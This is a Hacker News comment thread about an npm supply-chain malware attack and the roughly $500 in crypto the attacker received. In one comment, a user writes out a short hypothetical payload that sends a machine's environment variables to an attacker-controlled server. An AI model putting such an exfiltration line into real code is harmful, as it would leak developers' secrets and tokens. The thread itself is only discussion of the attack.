| ▲ | clbrmbr 3 days ago |
| Huh. I read TFA in detail (and shared with my team), but I didn’t see any analysis. (?) |
|
| ▲ | wodenokoto 3 days ago | parent | next [-] |
| > I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0... >Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers. I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you read if a donation is a worthless mockery donation. |
| |
| ▲ | naugtur 3 days ago | parent [-] | | I work with people who understand this stuff :D
But if I see a transaction for thousands or millions of a coin I've never heard of with $ value of about 1 it's likely a shitcoin and I am guessing - mockery. |
|
|
| ▲ | hiccuphippo 3 days ago | parent | prev | next [-] |
| It seems to be this:
https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0... 500 USD, not bad for a month of work if the author is from a 3rd world country. |
| |
| ▲ | Cthulhu_ 3 days ago | parent | next [-] | | "3rd world country" is an outdated cold war phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that merit, but it's the second richest country (by GDP) in the world. "Developing" or "poor" country may be a more accurate phrase. | |
| ▲ | javcasas 3 days ago | parent | prev | next [-] | | 3rd world country developers routinely earn more than that. A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are any competent, they can double that in an outsourcing consultancy. | |
| ▲ | naugtur 3 days ago | parent | prev [-] | | there's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so. 500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day. This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications. `fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload. |
|
|
| ▲ | crtasm 3 days ago | parent | prev [-] |
| I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0... |
